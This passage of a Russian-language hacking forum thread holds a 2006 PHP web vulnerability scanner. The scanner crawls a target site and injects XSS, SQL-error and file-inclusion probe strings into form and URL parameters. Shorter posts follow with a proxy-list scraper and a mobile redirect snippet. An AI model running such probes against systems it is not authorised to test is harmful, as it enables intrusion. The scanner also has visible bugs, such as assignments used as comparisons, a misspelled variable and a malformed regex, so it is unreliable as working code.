    * 25/09/06 0.2 : Better crawling, less bandwith/resource usage, speed improved, better vuln finding code
    *
    **/

    print_r('
    -------------------------------------------------------------------------------
    Php Vulnerability Scanner by KingOfska @ http://contropotere.netsons.org
    kingofska [at] gmail [dot] com
    -------------------------------------------------------------------------------
    ');

    if ($argc < 2) {
    print_r('
    Early release, please send bug report to help improving this script
    --------------------------------------------------------------------------------
    Usage: '.$argv[0].' host [start_path][port][debug]
    host: target server (ip/hostname)
    path: path from which to start scanning, if none entered starts from \'/\'
    port: port of the http server, default 80

    Examples:
    '.$argv[0].' localhost /folder/script.php 81

    --------------------------------------------------------------------------------
    ');
    die;
    }
    $host= $argv[1]; // Insert the host site i.e. : www.website.com
    $start_page = $argv[2]; // Insert the start page for the scan, if empty will start from index.*
    $port = 80 ;
    $additional_vars = array('id','page');
    $locator = array("123'",'\'\';!--"<XSS>=&{()}','some_inexisistent_file_to_include.php'); //XSS Locator from ha.ckers.org

    $debug = TRUE;
    /** Compatibility for php < 5
    * stripos() function made by rchillet at hotmail dot com
    *
    */
    if (!function_exists("stripos")) {
    function stripos($str,$needle,$offset=0)
    {
    return strpos(strtolower($str),strtolower($needle),$offset);
    }
    }
    /**
    * Do not edit below unless you know what you do...
    */
    $reqmade = 0 ;
    $time_start = getmicrotime();
    set_time_limit(0);
    error_reporting(E_ERROR);
    $checkedpages[]='';
    $result[] = '';
    $links[] = '';
    $checkedlinks[] = '' ;
    echo "Starting scan on $host:\r\nStarting page: $start_page\r\n";
    $site_links = index_site();
    $count = count($site_links);
    echo "Starting to scan $count pages...\r\n";

    foreach($site_links as $cur){

    echo "Testing: $cur \r\n";
    test_page($cur);

    }

    $time_end = getmicrotime();
    $result['time'] = substr($time_end - $time_start,0,4);
    $result['connections'] = $reqmade;
    $result['scanned'] = count($checkedpages);

    echo "Report:";

    foreach ($result['vuln'] as $type=> $url){
    echo "\r\n$type vulnerability found:\r\n";
    $url = array_unique($url);
    foreach($url as $cur){
    echo "$cur \r\n";
    }
    }
    $server = get_server_info();
    echo "\r\nAdditional infos:\r\n";
    echo "Site running on: ".$server['software']."\r\n";
    echo "Powered by: ".$server['powered']."\r\n";
    echo "Scan took ".$result['time']." seconds to scan ".$result['scanned']." pages using ".$result['connections']." connections\r\n";



    function index_site(){
    global $start_page;
    array($links);
    $tmp = get_links($start_page,true);
    foreach($tmp as $cur){
    $tmp2 = get_links($cur,true);
    $links = array_merge_recursive($links,$tmp2);
    }
    $links = array_unique(clean_array($links));
    $links[] = $start_page;
    sort($links);
    return($links);
    }


    /**
    * Testes a form using global vuln locator, both GET and POST method, and print result to screen
    * @author KingOfSka <[email protected]>
    * @param array $form Form to test
    * @return void
    */

    function test_form($form){
    $ret = '';
    $tmp = '';
    global $host,$port,$locator,$debug,$result ;
    if($form['action'][0] != '/' AND stripos($form['action'],'http://') === FALSE ){$form['action'] = '/'.$form['action'];}
    if ($form['method'] = 'get'){
    foreach($form['vars'] as $current){
    foreach($locator as $testing){
    $testing = urlencode($testing);
    $conn = fsockopen ("$host", $port, $errno, $errstr, 30);
    if (!$conn) {
    echo "$errstr ($errno)<br>\n";
    } else {
    if (!stripos('?',$data['action'])){
    $req = "GET ".$form['action']."?$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n";
    }else{
    $req= "GET ".$form['action']."&$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n";
    }
    if ($debug == TRUE){echo $req;}
    fputs ($conn, $req);
    while (!feof($conn)) {
    $tmp .= fgets ($conn,128);

    }
    fclose ($conn);

    do_test($tmp,$form['action'],$current);

    $tmp = '';
    }
    }
    }

    }else if ($form['method'] = 'post'){

    foreach($form['vars'] as $current){
    foreach($locator as $testing){
    $testing = urlencode($testing);
    $conn = fsockopen ("$host", $port, $errno, $errstr, 30);
    if (!$conn) {
    echo "$errstr ($errno)\r\n";
    } else {
    $req="POST ".$form['action']." HTTP/1.0\r\nHost: $host\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Close\r\nContent-Length: ".strlen($postit)."\r\n\r\n$postit\r\n\r\n";
    $postit = "$current=$testing" ;
    if ($debug == TRUE){echo $req;}
    fputs ($conn, $req);
    while (!feof($conn)) {
    $tmp .= fgets ($conn,128);
    }
    fclose ($conn);

    do_test($tmp,$form['action'],"POST: $current");
    $tmp = '';
    }
    }
    }


    }


    }
    /**
    * Catches and Parses HTML forms
    * @author KingOfSka <[email protected]>
    * @param string $page Page to scan for forms
    * @return Array
    **/

    function catch_forms($page){
    array($form);
    $data = get($page);
    preg_match_all('#<form .+?>.+?</form>#is',$data['content'],$matches);
    foreach ($matches[0] as $data['content']){
    preg_match('#<form (.+?)>(.+?)</form>#is',$data['content'],$matches);
    $form['setup'] = $matches[1];
    $form['content'] = $matches[2];
    preg_match('#method\s?=\s?["\']?(get|post)["\']?#i',$form['setup'],$matches);
    if (isset($matches[1])){
    $form['method'] = $matches[1];
    }else{
    $form['method'] = 'get';
    }
    preg_match('#action\s?=\s?["\']?([^"\']*)["\']?#i',$form['setup'],$matches);
    $form['action'] = $matches[1];
    preg_match_all('#<input (.*)>#i',$form['content'],$input);
    foreach($input[0] as $cur){
    preg_match('#name\s?=\s?["\']?(\w*)["\']?#i',$cur,$matches);
    $form['vars'][] = $matches[1];
    }
    print_r($form);
    test_form($form);
    }
    }

    function get_server_info(){
    global $site_links;
    array($server);
    foreach($site_links as $link){
    if(stripos($link,'.php')){
    $right = $link;
    break;
    }
    }
    $data = get($right);
    preg_match('#Server:\s?(\w.*)#',$data['headers'],$matches);
    $server['software'] = $matches[1];
    preg_match('#X-Powered-By:\s?(\w.*)#',$data['headers'],$matches);
    if (isset($matches[1])){
    $server['powered'] = $matches[1];
    }
    return $server;
    }

    function test_page($page){
    global $checkedpages;


    if (in_array($page,$checkedpages)){
    return;
    }


    catch_forms($page);
    $plinks = get_links($page,true);
    foreach ($plins as $cur){
    test_link($cur);
    }
    $checkedpages[] = $page ;

    }

    /**
    * Perform a simple GET request,returning an array containing
    * server-sent headers and content
    *
    * @author KingOfSka <[email protected]>
    * @param string $path Path to the resource to request
    * @param string $cookie Cookie string to pass along with the request (still to implement....)
    * @return Array
    **/

    function get($path = '/',$cookie = ''){
    global $host,$port,$debug,$reqmade,$checkedlinks;

    array($ret);
    $tmp = '';
    $conn = fsockopen ("$host", $port, $errno, $errstr, 30);
    $reqmade++;

    if($path[0] != '/' AND stripos($path,'http://') === FALSE){$path = '/'.$path;}
    if (!$conn) {
    echo "$errstr ($errno)<br>\n";
    } else {
    if ($debug == TRUE){echo "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";}
    fputs ($conn, "GET $path HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n");
    while (!feof($conn)) {
    $tmp .= fgets ($conn,128);
    }
    fclose ($conn);
    }

    //echo $tmp;
    preg_match('#HTTP\/1\.\d (\d\d\d)#',$tmp,$matches);

    if ($matches[1]!= 200){
    $ret = "HTTP Error Code NТА".$matches['1'];
    if ($debug == TRUE){echo "Debug:\r\n$tmp<br/>\r\n";}
    }
    if ($matches[1]== 302 OR $matches[1] == 301){
    preg_match('#Location:(.*)#',$tmp,$matches);
    if (!in_array($matches[1],$checkedlinks)){

    return get($matches[1]);
    }
    }
    $b = preg_split('#Content-Type: text/html#',$tmp);

    $ret['headers'] = $b[0];
    $ret['content'] = $b[1];
    if ($debug == TRUE){echo "Debug:\r\n".$ret['headers']."\r\n";}
    return $ret;
    }

    /**
    * Catches all the links in a webpage, checking they are not pointing to
    * files external at the host being scanned.
    *
    * @author KingOfSka <[email protected]>
    * @return Array
    **/

    function get_links($data,$getpage = FALSE){
    global $host,$links;
    if ($getpage == TRUE){
    $tmp = get($data);
    $data = $tmp['content'];
    }

    preg_match_all('#<a href=[\'"].+?[\'"].+?>#i',$data,$matches);

    foreach ($matches[0] as $current){


    preg_match('#<a href=["\'](.+?)["\'].+?>#i',$current,$matches);

    $current = $matches[1];
    if (is_valid_url($current)){
    if (stripos($current,$host) != FALSE OR stripos($current,'http://') === FALSE ){

    if ($current[0] == '?'){
    $current= 'index.php'.$current;

    }

    if (stripos($current,$host) === FALSE OR stripos($current,'http://') === FALSE){

    $current = "http://$host/$current";

    }
    if (!in_array($current,$links)){
    $retlinks[] = $current ;
    }
    }
    }
    }
    return array_unique($retlinks) ;
    }

    /**
    * Parse a link returning an array with the name of the file which
    * the link is pointing to, and the GET variables passed trhough it.
    *
    * @author KingOfSka <[email protected]>
    * @return Array
    * @param string $link Link to parse
    **/

    function parse_link($link){
    array($ret);


    $matches = explode('?',$link);
    $ret['action'] = $matches[0] ;
    $matches = explode('&',$matches[1]);
    foreach($matches as $cur){
    $matches = explode('=',$cur);
    $vars[] = $matches[0];
    }

    $ret['vars'] = $vars;

    return $ret;
    }
    /**
    * Tests a given link echoing found vulnerabilities
    *
    * @author KingOfSka <[email protected]>
    * @return void
    * @param $link Link to test
    **/

    function test_link($link){
    global $host,$port,$locator,$result;

    $ret = '';
    $tmp = '';
    $data = parse_link($link);
    //$data['vars'] = array_merge($data['vars'],$additional_vars);
    foreach($data['vars'] as $current){
    foreach($locator as $testing){
    $testing = urlencode($testing);
    $conn = fsockopen ("$host", $port, $errno, $errstr, 30);
    if (!$conn) {
    echo "$errstr ($errno)\r\n";
    } else {
    if (!stripos('?',$data['action'])){
    $req = "GET ".$data['action']."?$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n";
    }else{
    $req= "GET ".$data['action']."&$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n";
    }
    fputs ($conn, $req);

    while (!feof($conn)) {
    $tmp .= fgets ($conn,128);

    }

    fclose ($conn);
    do_test($tmp,$data['action'],$current);

    $tmp ='';
    }
    }
    }
    return;
    }

    /**
    * Removes empty item from a given array
    *
    * @return Array
    * @param $array array to clean
    **/

    function clean_array($array) {
    foreach ($array as $index => $value) {
    if(is_array($array[$index])) $array[$index] = clean_array($array[$index]);
    if (empty($value) OR !is_valid_url($value)) unset($array[$index]);
    }
    return $array;
    }

    function getmicrotime(){
    list($usec, $sec) = explode(" ",microtime());
    return ((float)$usec + (float)$sec);
    }

    function clean_url_array($array){
    foreach ($array as $cur){
    echo $cur;
    if(!is_valid_url($cur)) unset ($array[$cur]);
    }
    return $array;
    }

    function is_valid_url($url){

    if (!eregi("^(http|https)+:)\/\/)+[a-z0-9_-]+\.+[a-z0-9_-]",$url)){

    return FALSE;
    }else{
    return TRUE;
    }
    }

    function do_test($data,$path,$var){
    global $result;
    if (stripos($data,'\'\';!--"<XSS>=') OR stripos($data,"\'\';--\"<XSS>=") OR stripos($data,'<XSS>')){

    $result['vuln']['xss'][]=$path."?$var=[XSS]";
    }


    if (stripos($data,'You have an error in your SQL syntax')){
    $result['vuln']['sql'][]=$path."?$var=[SQL]";

    }



    if (stripos($data,'Failed opening \'some_inexisistent_file_to_include.php\' for inclusion')){
    $result['vuln']['rfi'][]=$path."?$var=[RFI]";
    }


    return;
    }

    ?>
     
    #296 Ch3ck, 18 Feb 2008
    Last edited: 18 Feb 2008
    1 person likes this.
  17. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    WSH: слежение за использованием CD/DVD-привода

    http://forum.script-coding.info/viewtopic.php?id=217
     
    1 person likes this.
  18. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    Прокси листер www.nntime.com
    PHP:
    <?
    echo 
    "<title>NNtime Proxy List</title>";
    function 
    proxylist($site){
    $source=file_get_contents($site);
    preg_match_all("/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}:[0-9]{2,4}/",$source,$matched);
    return 
    $matched[0];
    }

    $array=proxylist("http://www.nntime.com");
    foreach(
    $array as $tek){
    $tek=str_replace("
    "
    ,"",$tek);
    print 
    $tek."<br>";
    }
    ?> 
    Хотя правильней сделать вывод в файл...
    Скрипт не мой...
     
    #298 Ch3ck, 22 Feb 2008
    Last edited: 22 Feb 2008
  19. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    3000 java Скриптов
    >>>Тут<<<
    мож кто чё интересное найдёт
     
  20. real_kas

    real_kas Member

    Joined:
    22 Mar 2007
    Messages:
    40
    Likes Received:
    7
    Reputations:
    5
    Простенький скрипт перевода в Wap сайт телефона

    <?php
    if (strstr($HTTP_USER_AGENT, "Opera Mini")){
    header("location: http://wap.site.ru");
    }else{
    header("location: http://www.site.ru");
    }
    ?>
     
    2 people like this.